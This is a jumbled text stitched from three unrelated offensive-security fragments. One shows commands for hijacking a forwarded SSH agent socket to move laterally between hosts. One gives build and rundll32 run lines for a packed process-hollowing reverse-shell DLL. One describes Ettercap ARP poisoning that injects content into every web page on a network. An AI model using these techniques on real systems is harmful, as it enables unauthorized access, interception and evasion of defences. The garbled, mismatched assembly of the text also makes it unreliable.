Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.
root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460
root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld
user@internal:~$ hostname -f
internal.company.tld
| // docker run -it --rm -v `pwd`:/tmp/building ubuntu bash -c "cd /tmp/building; apt update && apt install -y mingw-w64 upx && i686-w64-mingw32-gcc -O3 -s process-hollow-shell-dll.c -lws2_32 -lntdll -shared -o process-hollow-shell.dll; upx --ultra-brute process-hollow-shell.dll" | |
| // | |
| // Use -DDEBUG at compile time, for the logging printf messages. | |
| // Use -DNON_MS_DLL_BLOCK at compile time, to block injection of non Microsoft DLL's into the host process. | |
| // Use -DWAITFOR at compile time, to wait for the host process to finish. | |
| // | |
| // Run: | |
| // rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 | |
| // rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe | |
| // rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe c:\windows\system32\notepad.exe |
Using this technique, Ettercap will poison the ARP table so that it will become a man-in-the-middle for all traffic on the network. It then uses the rotate.filter ettercap filter (which etterfilter compiles in rotate.sh) to inject some CSS3 into every HTML document so that it's rotated 180 degrees.
Now the internet is upside down!
